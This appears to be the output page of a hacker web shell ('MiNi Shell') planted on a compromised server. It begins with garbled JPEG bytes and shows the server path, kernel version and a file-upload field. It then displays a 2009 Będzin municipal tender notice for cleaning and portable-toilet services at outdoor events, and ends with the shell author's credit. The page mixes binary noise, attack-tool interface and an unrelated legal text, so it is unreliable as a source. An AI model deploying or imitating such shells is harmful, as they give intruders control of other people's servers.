JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090507/137978-N-2009.html

<p class="kh_header"><b>Będzin: Utrzymanie czystości i porządku podczas imprez plenerowych</b><br>
<b>Numer ogłoszenia: 137978 - 2009; data zamieszczenia: 07.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Będzina , ul. 11 Listopada 20, 42-500 Będzin, woj. śląskie, tel. 032 267-35-16, faks (032) 267 62 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bedzin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i porządku podczas imprez plenerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wszystkie prace obsługi imprez polegające na przygotowaniu terenu przed imprezami, posprzątanie po imprezach, a także obsługi w czasie imprez.
1.Wykaz prac które będą wykonywane każdorazowo przed imprezą:
1.1 zbieranie  odpadów komunalnych( papierów, niedopałków, butelek) gałęzi, gruzu, itp
1.2 ustawienie koszy na odpady komunalne o pojemności 120 l w miejscach i ilościach wskazanych przez Zamawiającego.
2.Wykaz prac które będą wykonywane w czasie trwania imprez:
2.1 zbieranie na bieżąco odpadów komunalnych ( papierów, niedopałków, butelek itp)
2.2 opróżnianie ustawionych koszy na odpady komunalne o pojemności 120 l.      
3.Wykaz prac które będą wykonywane każdorazowo po zakończeniu imprez:
3.1 zbieranie śmieci i odpadów komunalnych ( papierów, niedopałków, butelek itp)
3.2opróżnianie i zebranie koszy na odpady komunalne o pojemności 120 l,
Uwaga 
wszystkie prace  będą zlecane Wykonawcy każdorazowo  na piśmie i nie później niż 3 dni przed rozpoczęciem imprezy, 
odpady komunalne należy zbierać  z 100 procent powierzchni wskazanej przez Zamawiającego,
ustawienie koszy na śmieci o pojemności 120 l, które są własnością Wykonawcy.
Imprezy odbywać się będą w dniach:
1. 23 i 24.05.2009 r.  (godz. od 12:00 do 22:00)  teren OSIR boisko przy ulicy Sportowej, ul. Sportowa
 
L.p	Nazwa zadania	    Jednostka obmiarowa	 Krotność	         Obmiar 
1.	Sprzątanie odpadów komunalnych przed  imprezą m2	2
( sprzątanie rano w dniach 23.05.2009 r. i 24.05.2009 r. przed imprezą)	20 650 m2
2.	Sprzątanie odpadów komunalnych w czasie imprezy	 m2	2
na bieżąco 
( 2 dni)	20 650 m2
3.	Sprzątanie odpadów komunalnych po imprezie	 m2	2
( po imprezie np. wieczorem w dniach  23.05.2009 r. i 24.05.2009 r.)	20 650  m2
4.	Ustawienie i zebranie własnych koszy na śmieci o pojemności 120 l z utylizacją odpadów	1 szt.	1
 ( ustawienie w dniu 23.05.2009 r. , zebranie do 5 godzin po zakończeniu imprezy)	15
5.	Opróżnianie koszy na śmieci o pojemności 120 l	1 szt.	2
(na bieżąco  w ciągu 2 dni)	15
6.	Ustawienie toalet w miejscach wskazanych przez zamawiającego wraz z serwisem ( serwis polega na opróżnieniu toalety, posprzątaniu oraz zdezynfekowaniu toalety)
wywiezienie toalet przenośnych	1 szt.	2
(ustawienie przed imprezą w dniu 23.05.2009 r. 
 serwis w dniach 23 i 24.05.2009 r., zebranie do 5 godzin po zakończeniu imprezy)	8

2. 23.05.2009 r. (godz. od 12.00 do 23.00) DNI BĘDZINA teren przy zamku od ulicy Podzamcze i ul. Kołłątaja	
L.p	Nazwa zadania	Jednostka obmiarowa	Krotność	Obmiar 
1.	Sprzątanie odpadów komunalnych przed  imprezą	m2	2
( rano w dniu 23.05.2009 r. przed imprezą)	22 749 m2
2.	Sprzątanie odpadów komunalnych w czasie imprezy	m2	na bieżąco
( 1 dzień)	22 749 m2
3.	Sprzątanie odpadów komunalnych po imprezie	m2	( rano w dniu 24.05.2009 r. po imprezie )	22 749  m2
4.Ustawienie i zebranie własnych koszy na śmieci o pojemności 120 l z utylizacją odpadów	1 szt	1
( ustawienie w dniu 23.05.2009 r. , zebranie do 5 godzin po zakończeniu imprezy)	15
5.	Opróżnianie koszy na śmieci o pojemności 120 l	1 szt	1
(na bieżąco w ciągu dnia)	15
6.	Ustawienie toalet w miejscach wskazanych przez Zamawiającego wraz  z serwisem ( serwis polega na opróżnieniu toalety, posprzątaniu oraz zdezynfekowaniu toalety) wywiezienie toalety przenośnych	1 szt.	1
(ustawienie przed imprezą w dniu 23.05.2009 r., zebranie do 5 godzin po zakończeniu imprezy)	10


3.28.08.2009 r. do 30.08.2009 r. ( codziennie od 16:00 do 24:00)Festiwal muzyki Celtyckiej teren Zamku od ul. Podzamcze i ul. Kołłataja
l.p	Nazwa zadania	Jednostka obmiarowa	Krotność	Obmiar 
2.	Sprzątanie odpadów komunalnych przed  imprezą	m2	 ( sprzątanie rano przed impreza w dniach 28.08.2009 r., 29.08.2009 r., 30.08.2009 r. , 3 dni)	22 749 m2
3.	Sprzątanie odpadów komunalnych w czasie imprezy	m2	3
( sprzątanie na bieżąco w ciągu 3 dni)	22 749  m2
4.	Sprzątanie odpadów komunalnych po imprezie	m2	3
( sprzątanie np. wieczorem po imprezie w dniach 28.08.2009 r., 29.08.2009 r.,  i w godzinach do 9:00 w dniu  31.08.2009 r.)	22 749  m2
5.	Ustawienie i zebranie własnych koszy na śmieci o pojemności 120 l wraz z utylizacją odpadów	1 szt.	1
( ustawienie przed imprezą 28.08.2009 r. i zebranie po imprezie w godzinach do 9:00 w dniu 31.08.2009 r. 	15
6.	Opróżnianie koszy na śmieci o pojemności 120 l	1 szt.	3
( na bieżąco w ciągu 3 dni)	15
7.	Ustawienie toalet w miejscach wskazanych przez zamawiającego wraz z serwisem ( serwis polega na opróżnieniu toalety, posprzątaniu oraz zdezynfekowaniu toalety) wywiezienie toalet przenośnych	1 szt.	3
 ustawienie przed imprezą  w dniu 28.08.2009 r. 
serwis na bieżąco po każdym dniu
28.08.2009 r., 
29.08.2009 r.,
30.08.2009 r.
 zebranie  po  zakończeniu imprezy w godzinach  09:00 w dniu 31.08.2009 r.)	8
Zakres nie przekroczy ilości podanych powyżej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.51.32.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki uczestnictwa w postępowaniu określone są w ustawie z dnia 29 stycznia 2004r. Prawo zamówień publicznych ( dalej Pzp) ( tj. Dz. U z 2007r. Nr 223 poz. 1655 ze zm. ) oraz  w SIWZ. 
1.O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:  
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień:
Wymaga się:
a) przedłożenia aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
b)posiadania aktualnych zezwoleń wynikających z przepisów:
 ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2005r. nr 236 poz.2008 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Będzin, 
ustawy o odpadach (Dz. U. z 2001r. nr 62 poz. 628 ze zm.) tj. zezwolenie na     
prowadzenie działalności w zakresie transportu odpadów.
1.2. Posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
Wymaga się:
a)dysponowania co najmniej 5 osobami w tym :1 osoba koordynator i  4 osoby  ( pracownicy fizyczni) do obsługi imprez zgodnie z zakresem niniejszego postępowania.
oraz minimum 1 osobę kierowcę  do obsługi  samochodu dostawczego a także  minimum 1 osobę kierowcę  do obsługi  samochodu  do serwisu toalet przenośnych.
W przypadku udostępnienia Wykonawcy przez inne podmioty osób zdolnych do wykonania zamówienia Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.
b) dysponowania   wymienionymi  poniżej wymienionymi   jednostkami narzędzi i urządzeń
sprawnymi  technicznie w ilości nie mniejszej niż:
Samochód  dostawczy do 3,5 tony  do wywozu śmieci, odpadów komunalnych przed i w czasie obsługi oraz po zakończeniu imprez  1 szt.
Samochód  do serwisu toalet przenośnych   1 szt.
W przypadku udostępnienia Wykonawcy przez inne podmioty niezbędnych do wykonania zamówienia  narzędzi i urządzeń  Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Spełnienie warunków  ppkt. 1.3, 1.4 ocenianie będzie  na podstawie złożonego oświadczenia  na lub według  druku stanowiącego załącznik nr 2 do SIWZ  według reguły spełnia. nie spełnia.

Z postępowania o udzielenie zamówienia wyklucza się:
1) Wykonawców, którzy wyrządzili szkodę nie, wykonując zamówienia lub wykonując je nienależycie, a szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2)Wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono,z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3)Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5)spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6)spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano 
za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7)spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8)osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9)podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, 
na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10)Wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w  pkt 1.1 - 1.3 .


Z postępowania o udzielenie zamówienia wyklucza się również Wykonawców, którzy:
1)wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi 
w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji;
2)złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
3)nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, 
z zastrzeżeniem art.26 ust.3 ustawy Pzp;
4)nie zgodzili się na przedłużenie okresu związania ofertą.
2. Wykonawcy, którzy wspólnie ubiegać się będą o udzielenie zamówienia winni: 
a) ustanowić sposób  reprezentacji poprzez wyznaczenie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu  
i zawarcia umowy  i dołączyć do oferty dokument pełnomocnictwa, 
b) łącznie wykazać, iż posiadają niezbędną  wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz znajdują się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
c)  opisać ofertę w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.
3. Wykonawca może powierzyć wykonanie zamówienia Podwykonawcom.
Wykonawca winien wskazać w ofercie części zamówienia, której wykonanie powierzy Podwykonawcom.
3.1. Wykonawca może zawrzeć umowę z Podwykonawcą  po uzyskaniu zgody od Zamawiającego.
(Wykonawca winien przedstawić do akceptacji Zamawiającemu umowę lub projekt umowy zawierający zapis dot. zakresu  prac i sposobu rozliczeń finansowych pomiędzy  Zamawiającym, Wykonawcą  i Podwykonawcą). 
4.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1.1.a części V specyfikacji składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie
wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed  notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach złożonych przez Wykonawcę.
Niespełnienie chociażby jednego z ww warunków skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> (wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu)
1.Pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zapisu we właściwym rejestrze lub ewidencji, w tym wynikające z art. 23  ust.2ustawy Pzp.
2.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust. 1 ustawy Pzp  na druku lub według druku  załącznik nr 2  do SIWZ.
W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności oraz  że nie podlega wykluczeniu  na podstawie art. 24 ust.1 ustawy Pzp Zamawiający żąda następujących dokumentów:
3.Aktualnego odpisu właściwego rejestru albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne  przepisy wymagają wpisu do rejestru lub zgłoszenia do  ewidencji działalności gospodarczej,  wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  .
4. Aktualnych zezwoleń wynikających z przepisów:
 - ustawy o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2005r. nr 236 poz. 2008 ze zm.) tj. zezwolenie na prowadzenie działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Będzin, 
 - ustawy o odpadach (Dz. U. z 2001r. nr 62 poz. 628 ze zm.) tj. zezwolenie na     
 prowadzenie działalności w zakresie transportu odpadów.
 W celu  potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także że dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
5. Wykazu osób, które będą  uczestniczyć w wykonywaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, na lub wg wzoru stanowiącego załącznik nr 4 a do SIWZ - dla osób, którymi Wykonawca dysponuje i załącznik nr 4 b do SIWZ - dla osób, którymi Wykonawca będzie dysponował.
Wykaz winien zawierać: 
a) co najmniej 5 osób w tym :1 osoba koordynator i  4 osoby ( pracownicy fizyczni) do obsługi imprez zgodnie z zakresem niniejszego postępowania.
oraz minimum 1 osobę- kierowcę  do obsługi  samochodu dostawczego a także  minimum 1 osobę- kierowcę  do obsługi  samochodu  do serwisu toalet przenośnych
6. W przypadku udostępnienia Wykonawcy przez inne podmioty osób zdolnych do wykonania zamówienia Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.
7.W przypadku udostępnienia Wykonawcy przez inne podmioty niezbędnych do wykonania zamówienia  narzędzi i urządzeń  Wykonawca winien, przedstawić w ofercie pisemne zobowiązanie tych podmiotów.


UWAGA!
Dokumenty wymienione w pkt. 3,4, 6,7 mogą być przedstawione w formie oryginałów lub czytelnych kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bedzin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych
Urząd Miejski w Będzinie
ul. 11 Listopada 20
42-500 Będzin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 09:00, miejsce: Urząd Miejski w Będzinie
Biuro Zamówień Publicznych pok.117        
 42-500 Będzin ul. 11 Listopada 20.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com